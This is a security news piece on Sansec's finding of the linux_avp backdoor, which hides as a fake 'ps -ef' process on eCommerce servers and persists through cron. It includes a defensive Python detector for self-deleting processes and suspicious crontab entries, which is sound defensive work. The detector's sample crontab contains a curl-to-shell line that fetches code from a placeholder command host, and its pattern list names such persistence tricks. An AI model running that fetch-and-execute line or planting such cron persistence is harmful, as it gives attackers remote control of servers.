Sansec announced that it has discovered a new malicious agent, linux_avp, which hides as a system process on eCommerce servers. Sansec also stated that the malware has been deployed since last week. The agent takes commands from an Alibaba server located in Beijing.
Controlled from China
According to Sansec’s announcement, the attack started with automated eCommerce attack probes that test for various weaknesses in eCommerce platforms. The attackers found a file-upload vulnerability in a plugin, which allowed them to upload a webshell and modify the server code so that they could intercept customer data.
The malware removes itself from the disk and disguises itself as a fake “ps -ef” process
The attackers also upload a Golang program called linux_avp. It removes itself from the disk and disguises itself as a fake “ps -ef” process. Sansec’s analysis showed that linux_avp serves as a backdoor and waits for commands from an Alibaba-hosted server in Beijing.
The backdoor was built in a project folder named lin_avp by a user “dob” under the code name “GREECE”. It also injects a crontab entry that restores access even if the process is killed or the server is rebooted.
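The two behaviours described above, a binary that keeps running after deleting itself from disk and masquerades as “ps -ef”, and a crontab entry used for persistence, both leave traces a defender can look for. The following is an added example written for this article, not Sansec’s or eComscan’s code: it flags processes whose `/proc/<pid>/exe` link points at a deleted file or whose command line claims to be `ps` while the executable is not the real `ps` binary, and flags crontab lines with common persistence red flags. The known `ps` paths, the red-flag patterns, and all sample process and crontab records are assumptions constructed for the example; on a live Linux host `collect_live_processes()` builds the records from `/proc`.

```python
"""Heuristic checks for a self-deleting process disguised as ps, and for
suspicious crontab entries. Added example, not code from the article."""
import os
import re
from dataclasses import dataclass

# Paths of the legitimate ps binary on common distributions (assumption).
KNOWN_PS_PATHS = {"/usr/bin/ps", "/bin/ps"}

# Patterns that commonly appear in persistence cron jobs (assumption).
CRON_RED_FLAGS = (
    r"/tmp/", r"/dev/shm/",            # runs a payload from a scratch dir
    r"\bcurl\s", r"\bwget\s",           # fetches something at every run
    r"\|\s*(ba)?sh\b",                  # pipes fetched content into a shell
    r"base64\s+(-d|--decode)\b",        # decodes an embedded payload
)


@dataclass
class ProcRecord:
    pid: int
    cmdline: str  # /proc/<pid>/cmdline with NUL separators replaced by spaces
    exe: str      # readlink(/proc/<pid>/exe); ends in " (deleted)" if unlinked


def flag_process(p: ProcRecord) -> list[str]:
    """Return the reasons a process looks suspicious (empty list if none)."""
    reasons = []
    # The kernel appends " (deleted)" to the exe link when the binary was
    # unlinked after exec: the "removes itself from disk" trick.
    if p.exe.endswith(" (deleted)"):
        reasons.append("running binary deleted from disk")
    # A command line that reads like ps, backed by a different executable.
    argv = p.cmdline.split()
    real_exe = p.exe.removesuffix(" (deleted)")
    if argv and os.path.basename(argv[0]) == "ps" and real_exe not in KNOWN_PS_PATHS:
        reasons.append("cmdline claims to be ps but exe is " + p.exe)
    return reasons


def scan_processes(records: list[ProcRecord]) -> dict[int, list[str]]:
    """Map pid -> reasons for every record that triggered at least one check."""
    flagged = {}
    for p in records:
        reasons = flag_process(p)
        if reasons:
            flagged[p.pid] = reasons
    return flagged


def suspicious_cron_lines(crontab_text: str) -> list[str]:
    """Return crontab lines matching any red-flag pattern (comments skipped)."""
    hits = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if any(re.search(pat, s) for pat in CRON_RED_FLAGS):
            hits.append(s)
    return hits


def collect_live_processes() -> list[ProcRecord]:
    """Build ProcRecord objects from /proc on a Linux host (best effort)."""
    out = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue  # process exited, or we lack permission to read it
        out.append(ProcRecord(pid, cmdline, exe))
    return out


# Constructed sample records (not real telemetry from any host).
SAMPLE_PROCS = [
    ProcRecord(1201, "/usr/bin/ps -ef", "/usr/bin/ps"),              # genuine ps
    ProcRecord(1337, "ps -ef", "/tmp/example_payload (deleted)"),     # impostor
    ProcRecord(1400, "/usr/sbin/cron -f", "/usr/sbin/cron"),          # benign
]

# Constructed sample crontab (c2.example.invalid is a placeholder host).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://c2.example.invalid/x | sh
"""

if __name__ == "__main__":
    for pid, reasons in scan_processes(SAMPLE_PROCS).items():
        print(f"pid {pid}: " + "; ".join(reasons))
    for line in suspicious_cron_lines(SAMPLE_CRONTAB):
        print("cron: " + line)
```

The process check relies on two facts about Linux rather than on any signature: the kernel marks an unlinked executable in the `exe` link, and a command line is just a string the process can set for itself, so it has to be compared against the executable actually mapped. The cron patterns are deliberately broad and will produce false positives on legitimate maintenance jobs; treat hits as review candidates, not verdicts.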
Sansec stated that no other anti-virus vendor is currently aware of the situation. The malware was uploaded to VirusTotal on 8 October by an anonymous user, who may be the author. Sansec updated the detection capabilities of its eComscan security monitor and has detected the malware on several servers located in the U.S. and Europe.